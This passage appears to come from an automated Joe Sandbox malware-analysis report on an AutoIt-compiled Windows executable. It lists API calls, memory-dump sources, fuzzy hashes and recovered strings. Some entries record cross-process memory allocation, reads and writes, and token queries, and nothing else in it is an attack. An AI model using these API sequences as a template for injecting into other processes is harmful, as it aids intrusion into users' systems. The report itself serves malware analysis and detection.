                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00398D9C
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00398DA4
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00398DB2
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00398DBA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: b3b4c9a8baf76d25d08d469182736da4854758c5db0ecfb3be19ca2de82e8c4e
                                                          • Instruction ID: 95192010818e1b7e8758ba6fa8849119bf7b312ad76f5ab6395e970b6d0308de
                                                          • Opcode Fuzzy Hash: b3b4c9a8baf76d25d08d469182736da4854758c5db0ecfb3be19ca2de82e8c4e
                                                          • Instruction Fuzzy Hash: D531EE71500219EFDF01CF68D94CA9E7BBAEB55315F114229F925EA1D0C7B0AA10CB90
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0039B4C6
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0039B4E3
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0039B51B
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0039B541
                                                          • _wcsstr.LIBCMT ref: 0039B54B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                          • String ID:
                                                          • API String ID: 3902887630-0
                                                          • Opcode ID: c7c7343f6fd1af14923e3a2e2e7369e5e52550c31a8ad174b38561fe13683e3c
                                                          • Instruction ID: 7e737608b1d705a21d169afd5a4ae7564dbff4b91d906ea99c8052fd63ac0bba
                                                          • Opcode Fuzzy Hash: c7c7343f6fd1af14923e3a2e2e7369e5e52550c31a8ad174b38561fe13683e3c
                                                          • Instruction Fuzzy Hash: B221DA32604204BFEF275B39AD49E7BBB9DDF45750F028029F805DE161EB61DC5097A0
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003CB1C6
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003CB1EB
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003CB203
                                                          • GetSystemMetrics.USER32(00000004), ref: 003CB22C
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003B0FA5,00000000), ref: 003CB24A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: f444a4009958933d5d4fea5daf5092e16a2dcc8fc475d643a90494cdebb37781
                                                          • Instruction ID: 4d96adba1aa03de9fa359704adbe319d2dbb20c73823cf617355e8608b52cb0b
                                                          • Opcode Fuzzy Hash: f444a4009958933d5d4fea5daf5092e16a2dcc8fc475d643a90494cdebb37781
                                                          • Instruction Fuzzy Hash: AC219171510215AFCB12AF388C09F6AB7A9EB45321F154B38FD22D71E0E730AC10DB90
                                                          APIs
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003995E2
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00399614
                                                          • __itow.LIBCMT ref: 0039962C
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00399654
                                                          • __itow.LIBCMT ref: 00399665
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow$_memmove
                                                          • String ID:
                                                          • API String ID: 2983881199-0
                                                          • Opcode ID: 6dd874b8327d8ba0550a50b13c99844d4e706345db7bec9670b051349be62cc0
                                                          • Instruction ID: b90868cccec079312c1585f08961a14ad06859b1df2bed4bf3900d9a8698d5ab
                                                          • Opcode Fuzzy Hash: 6dd874b8327d8ba0550a50b13c99844d4e706345db7bec9670b051349be62cc0
                                                          • Instruction Fuzzy Hash: 4821C532B00218BBDF12AA698C89FEE7BADDB59720F05402AF904DF251D7709D459791
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 003B5B84
                                                          • GetForegroundWindow.USER32 ref: 003B5B9B
                                                          • GetDC.USER32(00000000), ref: 003B5BD7
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 003B5BE3
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 003B5C1E
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0034134D
                                                          • SelectObject.GDI32(?,00000000), ref: 0034135C
                                                          • BeginPath.GDI32(?), ref: 00341373
                                                          • SelectObject.GDI32(?,00000000), ref: 0034139C
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 003A4B61
                                                          • __beginthreadex.LIBCMT ref: 003A4B7F
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 003A4B94
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003A4BAA
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003A4BB1
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                          • String ID:
                                                          • API String ID: 3824534824-0
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00398546
                                                          • GetLastError.KERNEL32(?,0039800A,?,?,?), ref: 00398550
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,0039800A,?,?,?), ref: 0039855F
                                                          • HeapAlloc.KERNEL32(00000000,?,0039800A,?,?,?), ref: 00398566
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039857D
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5307
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003A5315
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A531D
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003A5327
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5363
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?,?,0039777D), ref: 0039744F
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?), ref: 0039746A
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?), ref: 00397478
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?), ref: 00397488
                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?), ref: 00397494
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003983E8
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003983F2
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00398401
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00398408
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0039841E
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00398449
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00398453
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00398462
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00398469
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0039847F
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0039C4B9
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0039C4D0
                                                          • MessageBeep.USER32(00000000), ref: 0039C4E8
                                                          • KillTimer.USER32(?,0000040A), ref: 0039C504
                                                          • EndDialog.USER32(?,00000001), ref: 0039C51E
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 003413BF
                                                          • StrokeAndFillPath.GDI32(?,?,0037BA08,00000000,?), ref: 003413DB
                                                          • SelectObject.GDI32(?,00000000), ref: 003413EE
                                                          • DeleteObject.GDI32 ref: 00341401
                                                          • StrokePath.GDI32(?), ref: 0034141C
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          APIs
                                                            • Part of subcall function 00360F36: std::exception::exception.LIBCMT ref: 00360F6C
                                                            • Part of subcall function 00360F36: __CxxThrowException@8.LIBCMT ref: 00360F81
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 00347BB1: _memmove.LIBCMT ref: 00347C0B
                                                          • __swprintf.LIBCMT ref: 0035302D
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00352EC6
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          APIs
                                                            • Part of subcall function 003448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003448A1,?,?,003437C0,?), ref: 003448CE
                                                          • CoInitialize.OLE32(00000000), ref: 003ABA47
                                                          • CoCreateInstance.OLE32(003D2D6C,00000000,00000001,003D2BDC,?), ref: 003ABA60
                                                          • CoUninitialize.OLE32 ref: 003ABA7D
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                          • String ID: .lnk
                                                          • API String ID: 2126378814-24824748
                                                          • Opcode ID: 7ad934f89422752de31362606140d731e29982459bc436f888b74a922e4c41f4
                                                          • Instruction ID: b1f1059dd6f5c095cdc15e4d409874bbdf6374b22f53bf1dab41e943f12b2157
                                                          • Opcode Fuzzy Hash: 7ad934f89422752de31362606140d731e29982459bc436f888b74a922e4c41f4
                                                          • Instruction Fuzzy Hash: F2A155756043059FCB12DF14C484E6ABBE9FF89314F058989F89A9B3A2CB31EC45CB91
                                                          APIs
                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0039B780
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ContainedObject
                                                          • String ID: AutoIt3GUI$Container$%=
                                                          • API String ID: 3565006973-2852750407
                                                          • Opcode ID: c81436194c7dd26a67b0b8d94734fa1e1b508223bc3256acab894e6873dbd042
                                                          • Instruction ID: 0733acfbcdc5a23a45386465e41dcdbef21f0414dc4d1de779aec3a0bb801e89
                                                          • Opcode Fuzzy Hash: c81436194c7dd26a67b0b8d94734fa1e1b508223bc3256acab894e6873dbd042
                                                          • Instruction Fuzzy Hash: AD914870604201AFDB15DF68D984B6ABBF8FF48710F10856EF94ACB691DBB0E840CB60
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 0036521D
                                                            • Part of subcall function 00370270: __87except.LIBCMT ref: 003702AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: e5323a354514682597791a64e49e7479b3c9aeb7976547c4f8426d5b58e8c792
                                                          • Instruction ID: ac95fb5fbccb730caef7564fc04169dd018eecfb366df162b79978a90ad40463
                                                          • Opcode Fuzzy Hash: e5323a354514682597791a64e49e7479b3c9aeb7976547c4f8426d5b58e8c792
                                                          • Instruction Fuzzy Hash: 8B518C65A0DA01D7EB3B7B14C95137E3B98DB00710F25CD79E0D9862ADEF398CC49A46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$+
                                                          • API String ID: 0-2552117581
                                                          • Opcode ID: 34ea79caae43ef895c1b4712ec8fc851b6e4eeff258c798289b4e7c3c16bc7a6
                                                          • Instruction ID: 73ff9ec61c05c8b5378ebaf4269d841f71b4b387554ad8a304877bcc0e3313e4
                                                          • Opcode Fuzzy Hash: 34ea79caae43ef895c1b4712ec8fc851b6e4eeff258c798289b4e7c3c16bc7a6
                                                          • Instruction Fuzzy Hash: C15120755052469FCF2BDF68C49AAFA7BB4EF19320F158055FC919B2A0D730AC82CB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_free
                                                          • String ID: Oa5
                                                          • API String ID: 2620147621-2933034282
                                                          • Opcode ID: 8039d84a7e2cd2af670afd600b6ff346a6c1a3d0a9e95f2923a603bd90603d0a
                                                          • Instruction ID: 3f7f7618b9b94462f9866fb12f1c7fd26942e7529ada96d641331013b2077f95
                                                          • Opcode Fuzzy Hash: 8039d84a7e2cd2af670afd600b6ff346a6c1a3d0a9e95f2923a603bd90603d0a
                                                          • Instruction Fuzzy Hash: 4F517E716083419FDB2ACF28C481B2BBBE5FF85355F55892DE9898B360E731D905CB42
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memset$_memmove
                                                          • String ID: ERCP
                                                          • API String ID: 2532777613-1384759551
                                                          • Opcode ID: 6a9a553ced58ff180a007a0f2d34eef849cda6518c68595363acd3c30fc46a80
                                                          • Instruction ID: 0f0c02b9af60af8a14c833fef1989800864b8ede623b866d3478db6afe49c310
                                                          • Opcode Fuzzy Hash: 6a9a553ced58ff180a007a0f2d34eef849cda6518c68595363acd3c30fc46a80
                                                          • Instruction Fuzzy Hash: 8151E7B1900309DBCB26CF55C842BAAB7F4FF04315F21856EE94ADB261E771A984CB40
                                                          APIs
                                                            • Part of subcall function 003A17ED: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00399558,?,?,00000034,00000800,?,00000034), ref: 003A1817
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00399B01
                                                            • Part of subcall function 003A17B8: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00399587,?,?,00000800,?,00001073,00000000,?,?), ref: 003A17E2
                                                            • Part of subcall function 003A170F: GetWindowThreadProcessId.USER32(?,?), ref: 003A173A
                                                            • Part of subcall function 003A170F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0039951C,00000034,?,?,00001004,00000000,00000000), ref: 003A174A
                                                            • Part of subcall function 003A170F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0039951C,00000034,?,?,00001004,00000000,00000000), ref: 003A1760
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00399B6E
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00399BBB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: 92be032ddf72f5c1012479c53a311aef82a0c2e5f9fecc77a410a95cf48b06fb
                                                          • Instruction ID: 32d8d2a32248545e5d7c384ebc93724703fbb8843ede0dacfdb718c6b51fa98b
                                                          • Opcode Fuzzy Hash: 92be032ddf72f5c1012479c53a311aef82a0c2e5f9fecc77a410a95cf48b06fb
                                                          • Instruction Fuzzy Hash: E7414C76900218AFDF11EFA4CD85FDEBBB8EB09700F104099FA55BB190DA716E45CB61
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003CF910,00000000,?,?,?,?), ref: 003C7A11
                                                          • GetWindowLongW.USER32 ref: 003C7A2E
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C7A3E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: 7fcfb97881715836aa9f2fc8bb99ec726c1220d9151347c0f961fbc26f6c6b08
                                                          • Instruction ID: 964347ef70af30a3bc26efadb901c5a905a687b541dc3518d75065cbe261eb31
                                                          • Opcode Fuzzy Hash: 7fcfb97881715836aa9f2fc8bb99ec726c1220d9151347c0f961fbc26f6c6b08
                                                          • Instruction Fuzzy Hash: 2E319A31204606AFDB129E38CC41FEA7BA9EB09324F214729F875E62E0C731ED519B50
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003C7493
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003C74A7
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C74CB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: 1687730edba5539318438fdc2f405433cccc1d76fff94ef876e434aeed8d54a5
                                                          • Instruction ID: dc23480115f47c3cffb32d63c33ddb829709e92d91cb4f86cdd555623496cd6d
                                                          • Opcode Fuzzy Hash: 1687730edba5539318438fdc2f405433cccc1d76fff94ef876e434aeed8d54a5
                                                          • Instruction Fuzzy Hash: 7821A132600219ABDF268FA5DC42FEA3B79EF48724F110218FE54AB191D675AC51DBA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003C7C7C
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003C7C8A
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003C7C91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
